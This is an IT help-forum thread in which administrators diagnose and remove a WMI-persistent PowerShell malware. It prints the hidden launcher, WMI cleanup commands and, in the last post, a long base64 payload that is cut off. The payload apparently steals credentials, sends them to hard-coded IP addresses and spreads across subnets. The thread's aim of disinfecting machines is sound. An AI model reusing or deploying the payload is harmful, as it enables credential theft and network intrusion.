    There are also extensions to Azure, AWS and other cloud services that add this kind of remote gateway service and may define custom schedulers to manage the gateway.


    \_(ツ)_/


    • Edited by jrv Saturday, October 28, 2017 4:50 PM
    Saturday, October 28, 2017 4:46 PM
  • Hi

    thanks for encoding this I searched every task scheduled job and nothing trying to see if some of the monitoring software on the network is not the cause of this.

    Thank you very much for quick responses, will post what I find.

    cheers

    Saturday, October 28, 2017 8:28 PM
  • Hi all

    My company is experiencing an almost identical issue to Mike.

    We have the same issue, in task manager the command line reads as follows:

    -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

    Upon further investigation, I was given the below script by the Spiceworks community to determine what properties this Powershell script is looking for:

    ([WmiClass] 'root\default:Win32_taskService').Properties['funs'].Value > C:\users\<Your username>\Desktop\Script Result.txt

    My result is similar to what JRV requested from Mike however our result is way more detailed.

    I would add it here how ever if I copy an paste it will make this post ridiculously long, is there a way I can attached a document to my post?

    Kind regards 



    Wednesday, November 01, 2017 5:30 AM
  • Here is the results of analysis of this encoded PowerShell script:

    So far it only is detected when it is converted to binary.

    It is clearly malware and very insidious.


    \_(ツ)_/


    • Edited by jrv Friday, November 03, 2017 10:06 PM
    Friday, November 03, 2017 10:05 PM
  • Good evening

    After much investigation and getting ESET involved we were able to find a fix for this issue.

    Please follow copy the below link and follow the guide I posted:

    https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved?page=1#entry-7336947

    I would have posted a hyper link however my account is not verified thus it will not allow me to do so and I do not have the time to verify it.

    Kind regards

    Sunday, November 05, 2017 5:14 PM
  • Hi all,

    It was a Trojan.Multi.GenAutorunWMI.a and ESET WMIObject cleaning helped after Trojan has been removed.

    Best

    Tuesday, November 07, 2017 7:41 PM
  • I am getting the same problem but devices all have relevant patches and running eset tool says the are "safe" but if I run the powershell scrips from the above post to clear on the third script I get the below error and after a reboot if I run the VBS it still dumps info in the text file;

    Cannot convert value "root\default:Win32_TaskService" to type "System.Management.ManagementClass". Error: "Not found "
    At line:1 char:1
    + Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerB ...
    + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : InvalidArgument: (:) [], RuntimeException
        + FullyQualifiedErrorId : InvalidCastToWMIClass

    Dean White


    • Edited by DeanWhite-ND Thursday, November 30, 2017 6:13 PM
    Thursday, November 30, 2017 6:12 PM
  • Sorry but this is not a PowerShell issue.  You will have to contact a consultant to help you fix your systems.


    \_(ツ)_/

    Thursday, November 30, 2017 7:10 PM
  • Hello
    I also found something similar on my 08 server, but I couldn't successfully decode the ciphertext.
    I use the base64 to turn the string. They prompted me to "not enter a valid Base-64 string, because it contains non Base-64 characters, more than two filled characters, or filled characters contain illegal characters".

    I want to ask you how to get the ciphertext out, and I'm using the PowerShell script

    function ConvertFrom-Base64String([string]$string)
    {
        $byteArray = [Convert]::FromBase64String($string)
        [System.Text.UnicodeEncoding]::Unicode.GetString($byteArray)
    }
    
    #the problem of base64 ciphertext
    $wishWords ='C:\Users\Administrator\Desktop\problem\base64.txt'
    
    $wishWords = ConvertFrom-Base64String $wishWords
     
    for($i=1;$i -le $wishWords.Length;$i++)
    {
        Clear-Host
        $wishWords.Substring(0,$i)
        sleep -Milliseconds 200
    }

    Monday, December 11, 2017 3:24 PM
  • i have similar issue on All virtual machine. has any body find out the solution for it? i can see that when i disable the internet it cpu doesnot shoot up. 

    Wednesday, December 13, 2017 3:56 PM
  • Hi;

    I have a similar problem, i think that is a variant, because only change this:

    $stime=[Environment]::TickCount

    $funs = ([WmiClass] 'root\default:Win32_Services').Properties['funs'].Value

    $defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

    iex $defun

    i have run this commands:

    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -filter "Name= 'SCM Event Filter'" |remOVe-WMIObject  -Verbose
    
    Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SCM Event Consumer'" | Remove-WMIObject -Verbose
    
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SCM Event Logs Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Win32_Services') | Remove-WMIObject -Verbose
    
    Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='DSM Event Log Filter'" | Remove-WMIObject  -Verbose ([WmiClass]'root\default:Win32_Services') | Remove-WMIObject -Verbose
    
    Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%SCM Event Logs Filter%'" | Remove-WMIObject -Verbose

    but i continue getting this result:

    NameSpace(2): root\subscription
    	Class: __FilterToConsumerBinding
    		Instance: __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"DSM Event Log Consumer\"",Filter="__EventFilter.Name=\"DSM Event Log Filter\""
     Found this link to __EventConsumer: CommandLineEventConsumer.Name="DSM Event Log Consumer"
    			Consumer: CommandLineEventConsumer.Name="DSM Event Log Consumer"
    			CreatorSID[0]: 1
    			CreatorSID[1]: 5
    			CreatorSID[2]: 0
    			CreatorSID[3]: 0
    			CreatorSID[4]: 0
    			CreatorSID[5]: 0
    			CreatorSID[6]: 0
    			CreatorSID[7]: 5
    			CreatorSID[8]: 21
    			CreatorSID[9]: 0
    			CreatorSID[10]: 0
    			CreatorSID[11]: 0
    			CreatorSID[12]: 177
    			CreatorSID[13]: 162
    			CreatorSID[14]: 229
    			CreatorSID[15]: 162
    			CreatorSID[16]: 13
    			CreatorSID[17]: 5
    			CreatorSID[18]: 154
    			CreatorSID[19]: 92
    			CreatorSID[20]: 248
    			CreatorSID[21]: 81
    			CreatorSID[22]: 114
    			CreatorSID[23]: 38
    			CreatorSID[24]: 160
    			CreatorSID[25]: 4
    			CreatorSID[26]: 0
    			CreatorSID[27]: 0
    			DeliverSynchronously: Falso
    			DeliveryQoS: 
     Found this link to __EventFilter: __EventFilter.Name="DSM Event Log Filter"
    			Filter: __EventFilter.Name="DSM Event Log Filter"
    			MaintainSecurityContext: Falso
    			SlowDownProviders: Falso
    			__PATH: \\SERV-MME-AIRES\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"DSM Event Log Consumer\"",Filter="__EventFilter.Name=\"DSM Event Log Filter\""
    			__NAMESPACE: ROOT\subscription
    			__SERVER: SERV-MME-AIRES
    			__DERIVATION[0]: __IndicationRelated
    			__DERIVATION[1]: __SystemClass
    			__PROPERTY_COUNT: 7
    			__RELPATH: __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"DSM Event Log Consumer\"",Filter="__EventFilter.Name=\"DSM Event Log Filter\""
    			__DYNASTY: __SystemClass
    			__SUPERCLASS: __IndicationRelated
    			__CLASS: __FilterToConsumerBinding
    			__GENUS: 2
    NameSpace(2): root\subscription
    	Class: __EventConsumer
    		Instance: CommandLineEventConsumer.Name="DSM Event Log Consumer"
    			CommandLineTemplate: powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBTAGUAcgB2AGkAYwBlAHMAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcARABTAE0AIABFAHYAZQBuAHQAJwB9ACAAfABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0AA0ACgAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAArACcAXABzAHkAcwB0AGUAbQAzADIAJwANAAoAaQBmACAAIAAoACEAKAB0AGUAcwB0AC0AcABhAHQAaAAgACQAZABpAHIAcABhAHQAaAAgACkAKQB7AA0ACgAgACAAIAAgACAAIAAgACAAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQADQAKAH0ADQAKAGkAZgAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwBwADEAMgAwAC4AZABsAGwAJwApACkAKQANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwAA0ACgAkAGUAeABpAHMAdAA9ACQARgBhAGwAcwBlAA0ACgBpAGYAIAAoACQAcABzAGkAZABzACAALQBuAGUAIAAkAG4AdQBsAGwAIAApAA0ACgB7AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBlACAALQBlAHEAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAAgACAAIAAgAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAJABwAHMAaQBkAHMAWwAwAF0AIAAtAGUAcQAgACQAbABpAG4AZQBbAC0AMQBdACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAMAAgACIAKQAgAC0AbwByACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAKQAgACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAeABpAHMAdAA9ACQAdAByAHUAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgByAGUAYQBrAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMwAzADMAMwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB2AGkAZAA9ACQAbABpAG4AZQBbAC0AMQBdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAGkAZAAgACQAZQB2AGkAZAAgAHwAIABzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AZgBvAHIAYwBlAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgBpAGYAIAAoACEAJABlAHgAaQBzAHQAIAAtAGEAbgBkACAAKAAkAHAAcwBpAGQAcwAuAGMAbwB1AG4AdAAgAC0AbABlACAAOAApACkADQAKAHsADQAKACAAIAAgACAAJABjAG0AZABtAG8AbgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAIAAtAE4AbwBuAEkAIAAtAFcAIABIAGkAZABkAGUAbgAgAGAAIgBgACQAbQBvAG4AIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuADMAMgBfAFMAZQByAHYAaQBjAGUAcwAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAG8AbgAnAF0ALgBWAGEAbAB1AGUAOwBgACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AMwAyAF8AUwBlAHIAdgBpAGMAZQBzACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlACAAOwBpAGUAeAAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAYAAkAGYAdQBuAHMAKQApACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAgAC0AUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAYAAkAFIAZQBtAG8AdABlAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAYAAkAG0AbwBuACwAIABgACQAbQBvAG4ALAAgACcAVgBvAGkAZAAnACwAIAAwACwAIAAnACcALAAgACcAJwApAGAAIgAiAA0ACgAgACAAIAAgACQAdgBiAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAA0ACgAgACAAIAAgACQAdgBiAHMALgByAHUAbgAoACQAYwBtAGQAbQBvAG4ALAAwACkADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBTAGUAcgB2AGkAYwBlAHMAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUADQAKACQAYQAsACAAJABOAFQATABNAD0AIABHAGUAdAAtAGMAcgBlAGQAcwAgACQAbQBpAG0AaQAgACQAbQBpAG0AaQANAAoAJABOAGUAdAB3AG8AcgBrAHMAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE4AZQB0AHcAbwByAGsAQQBkAGEAcAB0AGUAcgBDAG8AbgBmAGkAZwB1AHIAYQB0AGkAbwBuACAALQBFAEEAIABTAHQAbwBwACAAfAAgAD8AIAB7ACQAXwAuAEkAUABFAG4AYQBiAGwAZQBkAH0ADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AMwAyAF8AUwBlAHIAdgBpAGMAZQBzACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBTAGUAcgB2AGkAYwBlAHMAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgAzADIAXwBTAGUAcgB2AGkAYwBlAHMAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAcwBjACcAXQAuAFYAYQBsAHUAZQANAAoAWwBiAHkAdABlAFsAXQBdACQAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBjAGIAYQApAA0ACgANAAoAJABzAGUAPQBAACgAJwAxADkANQAuADIAMgAuADEAMgA3AC4AMQA1ADcAJwAsACAAJwA5ADMALgAxADcANAAuADkAMwAuADcAMwAnACkADQAKACQAbgBpAGMAPQAnADEAOQA1AC4AMgAyAC4AMQAyADcALgAxADUANwAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAgACAAIAAgACQAcABpAG4APQB0AGUAcwB0AC0AYwBvAG4AbgBlAGMAdABpAG8AbgAgACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBpAGMAPQAkAHQADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgByAGUAYQBrAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAfQANAAoAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAA0ACgBpAGYAIAAoACQAYQAuAGMAbwB1AG4AdAAgAC0AbgBlACAAMAApAA0ACgB7AA0ACgAJAGYAbwByAGUAYQBjAGgAKAAkAGEAYQAgAGkAbgAgACQAYQApAHsADQAKAAkACQAkAGQAYQB0AGEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBhACkAKQANAAoACQAJACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AYQBwAGkALgBwAGgAcAA/AGQAYQB0AGEAPQAiACAAKwAgACQAZABhAHQAYQApAA0ACgAJAH0ADQAKAH0ADQAKAGYAbwByAGUAYQBjAGgAIAAoACQATgBlAHQAdwBvAHIAawAgAGkAbgAgACQATgBlAHQAdwBvAHIAawBzACkADQAKAHsADQAKAA0ACgAgACAAIAAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAHAAQQBkAGQAcgBlAHMAcwBbADAAXQANAAoAIAAgACAAIABpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJABTAHUAYgBuAGUAdABNAGEAcwBrACAAIAA9ACAAJABOAGUAdAB3AG8AcgBrAC4ASQBQAFMAdQBiAG4AZQB0AFsAMABdAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoAIAAgACAAIAAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwAA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBlAC4AYwBvAHUAbgB0ACAALQBsAGUAIAA0ACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACQAaQA9ACQAbABpAG4AZQBbAC0AMwBdAC4AcwBwAGwAaQB0ACgAJwA6ACcAKQBbADAAXQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoAFQAZQBzAHQALQBDAG8AbgBuAGUAYwB0AGkAbwBuACAAJABpAHAAIAAtAGMAbwB1AG4AdAAgADEAKQAgAC0AbgBlACAAJABuAHUAbABsACAAIAAtAGEAbgBkACAAJABpAHAAcwB1ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAByAGUAPQAwAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAYQAuAGMAbwB1AG4AdAAgAC0AbgBlACAAMAApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlACAAPQAgAHQAZQBzAHQALQBpAHAAIAAtAGkAcAAgACQAaQBwACAALQBjAHIAZQBkAHMAIAAkAGEAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHIAZQAgAC0AZQBxACAAMQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAdQAgAD0AIAAkAGkAcABzAHUAIAArACAAIgAgACIAIAArACAAJABpAHAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGUAbABzAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJAByAGUAcwAgAD0AIABlAGIANwAgACQAaQBwACAAJABzAGMADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcgBlAHMAIAAtAG4AZQAgACQAdAByAHUAZQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZQBiADgAIAAkAGkAcAAgACQAcwBjAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgAgACsAI